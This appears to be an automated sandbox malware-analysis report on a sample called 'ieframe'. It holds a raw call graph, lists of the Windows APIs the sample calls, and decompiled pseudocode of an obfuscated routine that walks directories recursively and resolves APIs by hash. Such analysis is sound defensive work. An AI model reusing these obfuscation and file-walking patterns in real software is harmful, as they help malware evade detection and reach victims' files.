6539 322cae 6539->6168 6540->6168 6544 322fe2 6541->6544 6542 323f00 GetPEB 6542->6548 6543 3234c0 GetPEB 6543->6548 6545 323e60 GetPEB 6544->6545 6545->6540 6546 323e60 GetPEB 6546->6548 6547 323460 GetPEB 6547->6548 6548->6537 6548->6539 6548->6542 6548->6543 6548->6546 6548->6547 6550 324220 GetPEB 6548->6550 6588 3256f0 6548->6588 6597 322980 6548->6597 6550->6548 6552 324eb6 6551->6552 6552->6552 6553 324f3d 6552->6553 6554 323f00 GetPEB 6552->6554 6555 323e60 GetPEB 6552->6555 6553->6168 6554->6552 6555->6552 6574 32191f 6556->6574 6557 321bc6 6558 3235c0 GetPEB 6557->6558 6559 321bd0 6558->6559 6561 321bf1 6559->6561 6562 323f00 GetPEB 6559->6562 6560 321ba4 6560->6168 6565 321c23 6561->6565 6566 323f00 GetPEB 6561->6566 6563 321be5 6562->6563 6564 323e60 GetPEB 6563->6564 6564->6561 6568 321c4b 6565->6568 6571 323f00 GetPEB 6565->6571 6567 321c17 6566->6567 6570 323e60 GetPEB 6567->6570 6568->6168 6569 323f00 GetPEB 6569->6574 6570->6565 6573 321c3f 6571->6573 6572 324e30 GetPEB 6572->6574 6575 323e60 GetPEB 6573->6575 6574->6557 6574->6560 6574->6569 6574->6572 6577 323e60 GetPEB 6574->6577 6610 3235c0 6574->6610 6575->6568 6577->6574 6579 32422d 6578->6579 6582 324243 6578->6582 6580 323f00 GetPEB 6579->6580 6581 324237 6580->6581 6583 323e60 GetPEB 6581->6583 6584 323f00 GetPEB 6582->6584 6586 32426b 6582->6586 6583->6582 6585 32425f 6584->6585 6587 323e60 GetPEB 6585->6587 6586->6166 6587->6586 6593 325701 6588->6593 6589 325723 6589->6548 6590 3257e3 6590->6589 6591 323f00 GetPEB 6590->6591 6594 3257f6 6591->6594 6592 323f00 GetPEB 6592->6593 6593->6589 6593->6590 6593->6592 6596 323e60 GetPEB 6593->6596 6595 323e60 GetPEB 6594->6595 6595->6589 6596->6593 6603 3229a0 6597->6603 6598 322abf 6600 322b0c 6598->6600 6601 322ae4 6598->6601 6602 323f00 GetPEB 6598->6602 6599 323f00 GetPEB 6599->6603 6600->6548 6601->6600 6607 323f00 GetPEB 6601->6607 6604 322ad8 6602->6604 6603->6598 6603->6599 6606 323e60 GetPEB 6603->6606 6605 323e60 GetPEB 6604->6605 6605->6601 6606->6603 6608 322b00 6607->6608 6609 323e60 GetPEB 6608->6609 6609->6600 6611 3235e4 6610->6611 6612 323609 6611->6612 6613 323f00 GetPEB 6611->6613 6616 323f00 GetPEB 6612->6616 6619 323631 6612->6619 6614 3235fd 6613->6614 6615 323e60 GetPEB 6614->6615 6615->6612 6617 323625 6616->6617 6618 323e60 GetPEB 6617->6618 6618->6619 6619->6574 6621 325516 6620->6621 6625 32552c 6620->6625 6622 323f00 GetPEB 6621->6622 6623 325520 6622->6623 6624 323e60 GetPEB 6623->6624 6624->6625 6626 325586 6625->6626 6627 323f00 GetPEB 6625->6627 6626->6196 6628 32557a 6627->6628 6629 323e60 GetPEB 6628->6629 6629->6626 6641 32ab66 6630->6641 6631 32ab8c 6631->6213 6634 32ac52 6635 32ac71 6634->6635 6637 323f00 GetPEB 6634->6637 6640 32ac99 6635->6640 6642 323f00 GetPEB 6635->6642 6636 323f00 GetPEB 6636->6641 6638 32ac65 6637->6638 6639 323e60 GetPEB 6638->6639 6639->6635 6640->6213 6641->6631 6641->6634 6641->6636 6643 323e60 GetPEB 6641->6643 6703 324b70 6641->6703 6725 32acd0 6641->6725 6644 32ac8d 6642->6644 6643->6641 6645 323e60 GetPEB 6644->6645 6645->6640 6666 32a189 6646->6666 6647 32acd0 GetPEB 6647->6666 6648 32a552 6652 32a571 6648->6652 6655 323f00 GetPEB 6648->6655 6649 32a439 6649->6213 6651 323f00 GetPEB 6651->6666 6660 32a599 6652->6660 6661 323f00 GetPEB 6652->6661 6653 324220 GetPEB 6653->6666 6654 3234c0 GetPEB 6654->6666 6656 32a565 6655->6656 6658 323e60 GetPEB 6656->6658 6657 324b70 2 API calls 6657->6666 6658->6652 6660->6213 6662 32a58d 6661->6662 6664 323e60 GetPEB 6662->6664 6663 323460 GetPEB 6663->6666 6664->6660 6665 323e60 GetPEB 6665->6666 6666->6647 6666->6648 6666->6649 6666->6651 6666->6653 6666->6654 6666->6657 6666->6663 6666->6665 6735 32b520 6666->6735 6742 321150 6666->6742 6686 32a7c5 6667->6686 6668 32acd0 GetPEB 6668->6686 6669 32aa7c GetCurrentProcessId 6669->6686 6670 32aa19 6670->6213 6671 32aacd 6673 32aaec 6671->6673 6676 323f00 GetPEB 6671->6676 6672 324b70 2 API calls 6672->6686 6680 32ab14 6673->6680 6681 323f00 GetPEB 6673->6681 6678 32aae0 6676->6678 6677 3242c0 GetPEB 6677->6686 6679 323e60 GetPEB 6678->6679 6679->6673 6680->6213 6684 32ab08 6681->6684 6682 323f00 GetPEB 6682->6686 6683 323e60 GetPEB 6683->6686 6685 323e60 GetPEB 6684->6685 6685->6680 6686->6668 6686->6669 6686->6670 6686->6671 6686->6672 6686->6677 6686->6682 6686->6683 6757 3249a0 6686->6757 6767 324850 6686->6767 6696 32a5ef 6687->6696 6688 32a710 6688->6213 6689 323f00 GetPEB 6689->6696 6690 32a731 6692 32a750 6690->6692 6693 323f00 GetPEB 6690->6693 6699 32a778 6692->6699 6700 323f00 GetPEB 6692->6700 6695 32a744 6693->6695 6694 3242c0 GetPEB 6694->6696 6697 323e60 GetPEB 6695->6697 6696->6688 6696->6689 6696->6690 6696->6694 6698 323e60 GetPEB 6696->6698 6776 324370 6696->6776 6697->6692 6698->6696 6699->6213 6701 32a76c 6700->6701 6702 323e60 GetPEB 6701->6702 6702->6699 6704 324b82 6703->6704 6705 324b98 6703->6705 6706 323f00 GetPEB 6704->6706 6709 324bd7 CreateProcessW 6705->6709 6710 323f00 GetPEB 6705->6710 6707 324b8c 6706->6707 6708 323e60 GetPEB 6707->6708 6708->6705 6711 324c73 6709->6711 6712 324bf7 6709->6712 6713 324bc6 6710->6713 6711->6641 6714 324bff 6712->6714 6717 323f00 GetPEB 6712->6717 6719 324c33 6712->6719 6715 323e60 GetPEB 6713->6715 6714->6641 6716 324bd2 6715->6716 6716->6709 6718 324c27 6717->6718 6720 323e60 GetPEB 6718->6720 6721 324c5d 6719->6721 6722 323f00 GetPEB 6719->6722 6720->6719 6721->6641 6723 324c51 6722->6723 6724 323e60 GetPEB 6723->6724 6724->6721 6734 32aced 6725->6734 6726 3234c0 GetPEB 6726->6734 6727 32af9f 6728 32af37 6727->6728 6729 323f00 GetPEB 6727->6729 6728->6641 6730 32afb2 6729->6730 6732 323e60 GetPEB 6730->6732 6731 323e60 GetPEB 6731->6734 6732->6728 6733 323f00 GetPEB 6733->6734 6734->6726 6734->6727 6734->6728 6734->6731 6734->6733 6739 32b536 6735->6739 6736 32b55f 6736->6666 6737 32b633 6751 324fd0 6737->6751 6739->6736 6739->6737 6740 323f00 GetPEB 6739->6740 6741 323e60 GetPEB 6739->6741 6740->6739 6741->6739 6750 321160 6742->6750 6743 32124c 6744 323f00 GetPEB 6743->6744 6746 321244 6743->6746 6745 32125f 6744->6745 6747 323e60 GetPEB 6745->6747 6746->6666 6747->6746 6748 323f00 GetPEB 6748->6750 6749 323e60 GetPEB 6749->6750 6750->6743 6750->6746 6750->6748 6750->6749 6752 32500f 6751->6752 6753 324ff9 6751->6753 6752->6736 6754 323f00 GetPEB 6753->6754 6755 325003 6754->6755 6756 323e60 GetPEB 6755->6756 6756->6752 6761 3249c0 6757->6761 6758 3249ea 6758->6686 6759 324b37 6759->6758 6762 323f00 GetPEB 6759->6762 6760 323f00 GetPEB 6760->6761 6761->6758 6761->6759 6761->6760 6764 3234c0 GetPEB 6761->6764 6766 323e60 GetPEB 6761->6766 6763 324b4a 6762->6763 6765 323e60 GetPEB 6763->6765 6764->6761 6765->6758 6766->6761 6775 324870 6767->6775 6768 32496e 6770 323f00 GetPEB 6768->6770 6771 32492c 6768->6771 6769 323f00 GetPEB 6769->6775 6772 324981 6770->6772 6771->6686 6773 323e60 GetPEB 6772->6773 6773->6771 6774 323e60 GetPEB 6774->6775 6775->6768 6775->6769 6775->6771 6775->6774 6777 32450e 6776->6777 6778 324384 6776->6778 6777->6696 6778->6777 6779 323f00 GetPEB 6778->6779 6781 3243d6 6778->6781 6780 3243ca 6779->6780 6782 323e60 GetPEB 6780->6782 6783 323f00 GetPEB 6781->6783 6790 324436 6781->6790 6795 3244f4 6781->6795 6782->6781 6784 32442a 6783->6784 6786 323e60 GetPEB 6784->6786 6785 3244ba 6796 324550 6785->6796 6786->6790 6788 323f00 GetPEB 6788->6790 6790->6785 6790->6788 6791 323e60 GetPEB 6790->6791 6791->6790 6792 323f00 GetPEB 6793 3244e8 6792->6793 6794 323e60 GetPEB 6793->6794 6794->6795 6795->6696 6797 3244d0 6796->6797 6800 32456b 6796->6800 6797->6792 6797->6795 6798 323e60 GetPEB 6798->6800 6799 323f00 GetPEB 6799->6800 6800->6797 6800->6798 6800->6799 6802 3255c6 6801->6802 6803 3255e8 6802->6803 6804 323f00 GetPEB 6802->6804 6805 3256a8 6802->6805 6809 323e60 GetPEB 6802->6809 6803->6236 6804->6802 6805->6803 6806 323f00 GetPEB 6805->6806 6807 3256bb 6806->6807 6808 323e60 GetPEB 6807->6808 6808->6803 6809->6802 6818 324ca0 6810->6818 6811 324db4 6813 324d7c 6811->6813 6814 323f00 GetPEB 6811->6814 6812 323f00 GetPEB 6812->6818 6813->6236 6816 324dc7 6814->6816 6815 323e60 GetPEB 6815->6818 6817 323e60 GetPEB 6816->6817 6817->6813 6818->6811 6818->6812 6818->6813 6818->6815 6820 3246d7 6819->6820 6826 3246ed 6819->6826 6821 323f00 GetPEB 6820->6821 6822 3246e1 6821->6822 6824 323e60 GetPEB 6822->6824 6823 324760 6823->6241 6824->6826 6825 324721 6830 324752 6825->6830 6831 323f00 GetPEB 6825->6831 6826->6823 6826->6825 6827 323f00 GetPEB 6826->6827 6828 324715 6827->6828 6829 323e60 GetPEB 6828->6829 6829->6825 6830->6241 6832 324746 6831->6832 6833 323e60 GetPEB 6832->6833 6833->6830 6846 3225f0 6834->6846 6835 322912 6836 322937 6835->6836 6837 323f00 GetPEB 6835->6837 6843 32295f 6836->6843 6845 323f00 GetPEB 6836->6845 6841 32292b 6837->6841 6838 3242c0 GetPEB 6838->6846 6839 323f00 GetPEB 6839->6846 6840 322771 6840->6268 6842 323e60 GetPEB 6841->6842 6842->6836 6843->6268 6844 323e60 GetPEB 6844->6846 6847 322953 6845->6847 6846->6835 6846->6838 6846->6839 6846->6840 6846->6844 6848 323e60 GetPEB 6847->6848 6848->6843 6857 321010 6849->6857 6850 323f00 GetPEB 6850->6857 6851 321105 6852 32103a 6851->6852 6853 323f00 GetPEB 6851->6853 6852->6294 6854 321118 6853->6854 6856 323e60 GetPEB 6854->6856 6855 323e60 GetPEB 6855->6857 6856->6852 6857->6850 6857->6851 6857->6852 6857->6855 6859 3234c0 GetPEB 6858->6859 6860 3236c4 6859->6860 6861 3236e5 6860->6861 6862 323f00 GetPEB 6860->6862 6864 32371a 6861->6864 6866 323f00 GetPEB 6861->6866 6863 3236d9 6862->6863 6865 323e60 GetPEB 6863->6865 6869 323742 6864->6869 6870 323f00 GetPEB 6864->6870 6865->6861 6867 32370e 6866->6867 6868 323e60 GetPEB 6867->6868 6868->6864 6873 323f00 GetPEB 6869->6873 6875 32376e 6869->6875 6871 323736 6870->6871 6872 323e60 GetPEB 6871->6872 6872->6869 6874 323762 6873->6874 6876 323e60 GetPEB 6874->6876 6875->6070 6876->6875 6880 327712 6877->6880 6878 3277b3 6882 323f00 GetPEB 6878->6882 6886 3277d2 6878->6886 6879 3234c0 GetPEB 6879->6880 6880->6878 6880->6879 6881 3278a3 6880->6881 6884 323f00 GetPEB 6880->6884 6887 323e60 GetPEB 6880->6887 6881->6371 6883 3277c6 6882->6883 6885 323e60 GetPEB 6883->6885 6884->6880 6885->6886 6886->6371 6887->6880 7108 329b60 7109 329b80 7108->7109 7110 329dd0 GetPEB 7109->7110 7111 329d96 7109->7111 7112 329d12 7109->7112 7114 323f00 GetPEB 7109->7114 7117 323e60 GetPEB 7109->7117 7110->7109 7111->7112 7113 323f00 GetPEB 7111->7113 7115 329da9 7113->7115 7114->7109 7116 323e60 GetPEB 7115->7116 7116->7112 7117->7109 7118 3247e0 7119 324c80 GetPEB 7118->7119 7120 3247f5 7119->7120 6946 321928 6966 32191f 6946->6966 6947 321bc6 6948 3235c0 GetPEB 6947->6948 6949 321bd0 6948->6949 6951 321bf1 6949->6951 6952 323f00 GetPEB 6949->6952 6950 321ba4 6955 321c23 6951->6955 6956 323f00 GetPEB 6951->6956 6953 321be5 6952->6953 6954 323e60 GetPEB 6953->6954 6954->6951 6958 321c4b 6955->6958 6960 323f00 GetPEB 6955->6960 6957 321c17 6956->6957 6959 323e60 GetPEB 6957->6959 6959->6955 6962 321c3f 6960->6962 6961 324e30 GetPEB 6961->6966 6963 323e60 GetPEB 6962->6963 6963->6958 6964 3235c0 GetPEB 6964->6966 6965 323f00 GetPEB 6965->6966 6966->6947 6966->6950 6966->6961 6966->6964 6966->6965 6967 323e60 GetPEB 6966->6967 6967->6966 7127 324869 7130 324870 7127->7130 7128 32496e 7131 323f00 GetPEB 7128->7131 7132 32492c 7128->7132 7129 323f00 GetPEB 7129->7130 7130->7128 7130->7129 7130->7132 7135 323e60 GetPEB 7130->7135 7133 324981 7131->7133 7134 323e60 GetPEB 7133->7134 7134->7132 7135->7130 6968 32b110 6969 32b124 6968->6969 6970 326060 GetPEB 6969->6970 6981 32b1aa 6969->6981 6971 32b136 6970->6971 6972 323310 GetPEB 6971->6972 6973 32b14c 6972->6973 6974 32b182 6973->6974 6975 323f00 GetPEB 6973->6975 6978 323f00 GetPEB 6974->6978 6974->6981 6976 32b176 6975->6976 6977 323e60 GetPEB 6976->6977 6977->6974 6979 32b19e 6978->6979 6980 323e60 GetPEB 6979->6980 6980->6981 6991 32a198 6992 32a189 6991->6992 6993 32acd0 GetPEB 6992->6993 6994 32a552 6992->6994 6995 32a439 6992->6995 6996 321150 GetPEB 6992->6996 6997 324220 GetPEB 6992->6997 6998 3234c0 GetPEB 6992->6998 7002 324b70 2 API calls 6992->7002 7004 32b520 GetPEB 6992->7004 7008 323460 GetPEB 6992->7008 7010 323f00 GetPEB 6992->7010 7011 323e60 GetPEB 6992->7011 6993->6992 6999 323f00 GetPEB 6994->6999 7001 32a571 6994->7001 6996->6992 6997->6992 6998->6992 7000 32a565 6999->7000 7003 323e60 GetPEB 7000->7003 7005 32a599 7001->7005 7006 323f00 GetPEB 7001->7006 7002->6992 7003->7001 7004->6992 7007 32a58d 7006->7007 7009 323e60 GetPEB 7007->7009 7008->6992 7009->7005 7010->6992 7011->6992 7136 321fd8 7142 321fd2 7136->7142 7137 322212 7138 322208 7137->7138 7140 324220 GetPEB 7137->7140 7139 3242c0 GetPEB 7139->7142 7140->7138 7141 323f00 GetPEB 7141->7142 7142->7137 7142->7138 7142->7139 7142->7141 7143 323e60 GetPEB 7142->7143 7143->7142 5969 323780 5970 3237ab 5969->5970 5971 323795 5969->5971 5974 3237dd 5970->5974 5976 323f00 GetPEB 5970->5976 5972 323f00 GetPEB 5971->5972 5973 32379f 5972->5973 5975 323e60 GetPEB 5973->5975 5979 323812 5974->5979 5980 323f00 GetPEB 5974->5980 5975->5970 5977 3237d1 5976->5977 5978 323e60 GetPEB 5977->5978 5978->5974 5982 32384a 5979->5982 5984 323f00 GetPEB 5979->5984 5981 323806 5980->5981 5983 323e60 GetPEB 5981->5983 5987 323876 5982->5987 5988 323f00 GetPEB 5982->5988 5983->5979 5985 32383e 5984->5985 5986 323e60 GetPEB 5985->5986 5986->5982 5990 3238d1 SHFileOperationW 5987->5990 5992 323f00 GetPEB 5987->5992 5989 32386a 5988->5989 5991 323e60 GetPEB 5989->5991 5991->5987 5993 3238c0 5992->5993 5994 323e60 GetPEB 5993->5994 5995 3238cc 5994->5995 5995->5990 7024 322b80 7025 322baf 7024->7025 7026 322b99 7024->7026 7027 323f00 GetPEB 7026->7027 7028 322ba3 7027->7028 7029 323e60 GetPEB 7028->7029 7029->7025 7144 327e40 7145 327e50 7144->7145 7146 327f83 7145->7146 7147 327f7a 7145->7147 7150 3234c0 GetPEB 7145->7150 7151 323e60 GetPEB 7145->7151 7152 323f00 GetPEB 7145->7152 7148 3238f0 2 API calls 7146->7148 7149 327f96 7148->7149 7150->7145 7151->7145 7152->7145 7036 326208 7045 326202 7036->7045 7037 3242c0 GetPEB 7037->7045 7038 3255b0 GetPEB 7038->7045 7039 32624b 7040 324c80 GetPEB 7040->7045 7041 323f00 GetPEB 7041->7045 7042 326490 7043 323e60 GetPEB 7043->7045 7044 323f00 GetPEB 7047 32642d 7044->7047 7045->7037 7045->7038 7045->7039 7045->7040 7045->7041 7045->7043 7045->7047 7046 323e60 GetPEB 7046->7047 7047->7042 7047->7044 7047->7046 7048 326608 7090 3265fd 7048->7090 7049 3294d0 GetPEB 7049->7090 7050 3268df 7051 326dcd 7059 32b2e0 GetPEB 7051->7059 7052 327410 GetPEB 7052->7090 7053 328bb0 2 API calls 7053->7090 7054 32706e 7058 328740 3 API calls 7054->7058 7055 329f30 GetPEB 7055->7090 7056 329050 GetPEB 7056->7090 7057 32b1d0 GetPEB 7057->7090 7065 327073 7058->7065 7059->7050 7060 327061 7063 328d40 2 API calls 7060->7063 7061 3272d0 GetPEB 7061->7090 7062 329860 6 API calls 7062->7090 7072 327066 7063->7072 7064 3261e0 GetPEB 7064->7090 7066 3280a0 2 API calls 7066->7090 7067 3253d0 GetPEB 7067->7090 7068 326f27 GetTickCount 7068->7090 7069 329270 GetPEB 7069->7090 7070 327120 3 API calls 7070->7090 7071 328700 GetPEB 7071->7090 7073 324770 2 API calls 7073->7090 7074 323310 GetPEB 7074->7090 7075 3212b0 2 API calls 7075->7090 7076 32b430 3 API calls 7076->7090 7077 324220 GetPEB 7077->7090 7078 328970 2 API calls 7078->7090 7079 323e60 GetPEB 7079->7090 7080 328e80 2 API calls 7080->7090 7081 326060 GetPEB 7081->7090 7082 328400 2 API calls 7082->7090 7083 326975 GetTickCount 7083->7090 7084 329620 2 API calls 7084->7090 7085 321840 GetPEB 7085->7090 7086 32afe0 GetPEB 7086->7090 7087 323460 GetPEB 7087->7090 7088 323f00 GetPEB 7088->7090 7089 324160 GetPEB 7089->7090 7090->7049 7090->7050 7090->7051 7090->7052 7090->7053 7090->7054 7090->7055 7090->7056 7090->7057 7090->7060 7090->7061 7090->7062 7090->7064 7090->7066 7090->7067 7090->7068 7090->7069 7090->7070 7090->7071 7090->7073 7090->7074 7090->7075 7090->7076 7090->7077 7090->7078 7090->7079 7090->7080 7090->7081 7090->7082 7090->7083 7090->7084 7090->7085 7090->7086 7090->7087 7090->7088 7090->7089

                                                        Executed Functions

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 00310448
                                                          • Part of subcall function 00311140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00310EFD,00000000), ref: 00311155
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 00310463
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00310484
                                                        • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 0031048D
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00310492
                                                        • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 0031049F
                                                        • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 003104A6
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 003104B9
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 003104E0
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 003104F7
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 00310519
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 00310530
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 00310547
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 00310562
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285120425.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_310000_ieframe.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                        • String ID:
                                                        • API String ID: 482429597-0
                                                        • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction ID: 421acc8dc471240f9b31c821490566ca00b0e996d0ef31cd7fd636d0b85f10c2
                                                        • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction Fuzzy Hash: 37414FB19143407EE719EB618846FEBB3EDAB8C750F408D2CB7449B141DAB4D9848B62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 375 3238f0-32390b 376 323910-323915 375->376 377 32391b 376->377 378 323a69-323a6e 376->378 381 323921-323926 377->381 382 323a5f-323a64 377->382 379 323a70-323a75 378->379 380 323acc-323adf call 3234c0 378->380 383 323ab6-323abb 379->383 384 323a77-323a7e 379->384 396 323ae1-323af7 call 323f00 call 323e60 380->396 397 323afc-323b17 380->397 385 323a17-323a1e 381->385 386 32392c-323931 381->386 382->376 383->376 393 323ac1-323acb 383->393 389 323a80-323a96 call 323f00 call 323e60 384->389 390 323a9b-323ab1 384->390 391 323a20-323a36 call 323f00 call 323e60 385->391 392 323a3b-323a4f FindFirstFileW 385->392 394 323b70-323b77 386->394 395 323937-32393c 386->395 389->390 390->376 391->392 402 323b97-323ba1 392->402 403 323a55-323a5a 392->403 400 323b94 394->400 401 323b79-323b8f call 323f00 call 323e60 394->401 395->383 404 323942-323947 395->404 396->397 425 323b34-323b3f 397->425 426 323b19-323b2f call 323f00 call 323e60 397->426 400->402 401->400 403->376 405 3239f1-323a12 404->405 406 32394d-323953 404->406 405->376 412 323974-323976 406->412 413 323955-32395d 406->413 420 32396d-323972 412->420 422 323978-32398b call 3234c0 412->422 419 32395f-323963 413->419 413->420 419->412 429 323965-32396b 419->429 420->376 439 3239a8-3239ec call 3238f0 call 323460 422->439 440 32398d-3239a3 call 323f00 call 323e60 422->440 437 323b41-323b57 call 323f00 call 323e60 425->437 438 323b5c-323b6b 425->438 426->425 429->412 429->420 437->438 438->376 439->376 440->439
                                                        C-Code - Quality: 63%
                                                        			E003238F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				short _v524;
                                                        				char _v1044;
                                                        				short _v1588;
                                                        				intOrPtr _v1590;
                                                        				struct _WIN32_FIND_DATAW _v1636;
                                                        				void* _v1640;
                                                        				intOrPtr _v1652;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t22;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr* _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t33;
                                                        				signed int _t34;
                                                        				void* _t39;
                                                        				intOrPtr* _t42;
                                                        				signed int _t46;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr _t55;
                                                        				void* _t56;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				void* _t94;
                                                        				void* _t95;
                                                        				void* _t96;
                                                        				void* _t98;
                                                        
                                                        				_t91 = __ecx;
                                                        				_t95 = __edx;
                                                        				_v1640 = __ecx;
                                                        				_t22 = 0x25a25425;
                                                        				_t56 = _v1640;
                                                        				while(1) {
                                                        					L1:
                                                        					_t98 = _t22 - 0x25a25425;
                                                        					if(_t98 > 0) {
                                                        						break;
                                                        					}
                                                        					if(_t98 == 0) {
                                                        						_t22 = 0x29bc40d3;
                                                        						continue;
                                                        					} else {
                                                        						if(_t22 == 0x8a099c9) {
                                                        							if( *0x32e430 == 0) {
                                                        								 *0x32e430 = E00323E60(_t56, E00323F00(0x9bab0b12), 0x83efb111, _t95);
                                                        							}
                                                        							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                        							_t56 = _t39;
                                                        							if(_t56 == 0xffffffff) {
                                                        								return _t39;
                                                        							} else {
                                                        								_t22 = 0x1a4f9837;
                                                        								continue;
                                                        							}
                                                        						} else {
                                                        							if(_t22 == 0xb46fa16) {
                                                        								_t42 =  *0x32dba4;
                                                        								if(_t42 == 0) {
                                                        									_t42 = E00323E60(_t56, E00323F00(0x9bab0b12), 0xd274268a, _t95);
                                                        									 *0x32dba4 = _t42;
                                                        								}
                                                        								return  *_t42(_t56);
                                                        							}
                                                        							if(_t22 != 0x1a4f9837) {
                                                        								L27:
                                                        								if(_t22 != 0x55fa1f4) {
                                                        									continue;
                                                        								} else {
                                                        									return _t22;
                                                        								}
                                                        							} else {
                                                        								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                        									_t46 = _a4( &_v1636, _a8);
                                                        									asm("sbb eax, eax");
                                                        									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
                                                        								} else {
                                                        									if(_v1636.cFileName != 0x2e) {
                                                        										L12:
                                                        										if(_t95 == 0) {
                                                        											goto L11;
                                                        										} else {
                                                        											_t94 = E003234C0(0x32d290);
                                                        											_t50 =  *0x32e158;
                                                        											if(_t50 == 0) {
                                                        												_t50 = E00323E60(_t56, E00323F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        												 *0x32e158 = _t50;
                                                        											}
                                                        											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
                                                        											E003238F0( &_v1044, _t95, _a4, _a8);
                                                        											_t96 = _t96 + 0x1c;
                                                        											E00323460(_t94);
                                                        											_t22 = 0x36cb81de;
                                                        										}
                                                        									} else {
                                                        										_t55 = _v1590;
                                                        										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
                                                        											L11:
                                                        											_t22 = 0x36cb81de;
                                                        										} else {
                                                        											goto L12;
                                                        										}
                                                        									}
                                                        								}
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L40:
                                                        				}
                                                        				if(_t22 == 0x29bc40d3) {
                                                        					_t93 = E003234C0(0x32d260);
                                                        					_t24 =  *0x32e158;
                                                        					if(_t24 == 0) {
                                                        						_t24 = E00323E60(_t56, E00323F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        						 *0x32e158 = _t24;
                                                        					}
                                                        					 *_t24( &_v524, 0x104, _t93, _t91);
                                                        					_t26 =  *0x32e494;
                                                        					_t96 = _t96 + 0x10;
                                                        					if(_t26 == 0) {
                                                        						_t26 = E00323E60(_t56, E00323F00(0x9bab0b12), 0x7facde30, _t95);
                                                        						 *0x32e494 = _t26;
                                                        					}
                                                        					_t92 =  *_t26();
                                                        					_t28 =  *0x32df30;
                                                        					if(_t28 == 0) {
                                                        						_t28 = E00323E60(_t56, E00323F00(0x9bab0b12), 0x5010a54d, _t95);
                                                        						 *0x32df30 = _t28;
                                                        					}
                                                        					 *_t28(_t92, 0, _t93);
                                                        					_t91 = _v1652;
                                                        					_t22 = 0x8a099c9;
                                                        					goto L1;
                                                        				} else {
                                                        					if(_t22 != 0x36cb81de) {
                                                        						goto L27;
                                                        					} else {
                                                        						_t33 =  *0x32df88;
                                                        						if(_t33 == 0) {
                                                        							_t33 = E00323E60(_t56, E00323F00(0x9bab0b12), 0xa53a5b1a, _t95);
                                                        							 *0x32df88 = _t33;
                                                        						}
                                                        						_t34 =  *_t33(_t56,  &_v1636);
                                                        						asm("sbb eax, eax");
                                                        						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
                                                        						goto L1;
                                                        					}
                                                        				}
                                                        				goto L40;
                                                        			}































                                                        0x003238fa
                                                        0x003238fc
                                                        0x003238fe
                                                        0x00323902
                                                        0x00323907
                                                        0x00323910
                                                        0x00323910
                                                        0x00323910
                                                        0x00323915
                                                        0x00000000
                                                        0x00000000
                                                        0x0032391b
                                                        0x00323a5f
                                                        0x00000000
                                                        0x00323921
                                                        0x00323926
                                                        0x00323a1e
                                                        0x00323a36
                                                        0x00323a36
                                                        0x00323a48
                                                        0x00323a4a
                                                        0x00323a4f
                                                        0x00323ba1
                                                        0x00323a55
                                                        0x00323a55
                                                        0x00000000
                                                        0x00323a55
                                                        0x0032392c
                                                        0x00323931
                                                        0x00323b70
                                                        0x00323b77
                                                        0x00323b8a
                                                        0x00323b8f
                                                        0x00323b8f
                                                        0x00000000
                                                        0x00323b95
                                                        0x0032393c
                                                        0x00323ab6
                                                        0x00323abb
                                                        0x00000000
                                                        0x00323acb
                                                        0x00323acb
                                                        0x00323acb
                                                        0x00323942
                                                        0x00323947
                                                        0x003239fd
                                                        0x00323a06
                                                        0x00323a0d
                                                        0x0032394d
                                                        0x00323953
                                                        0x00323974
                                                        0x00323976
                                                        0x00000000
                                                        0x00323978
                                                        0x00323982
                                                        0x00323984
                                                        0x0032398b
                                                        0x0032399e
                                                        0x003239a3
                                                        0x003239a3
                                                        0x003239bc
                                                        0x003239d8
                                                        0x003239dd
                                                        0x003239e2
                                                        0x003239e7
                                                        0x003239e7
                                                        0x00323955
                                                        0x00323955
                                                        0x0032395d
                                                        0x0032396d
                                                        0x0032396d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0032395d
                                                        0x00323953
                                                        0x00000000
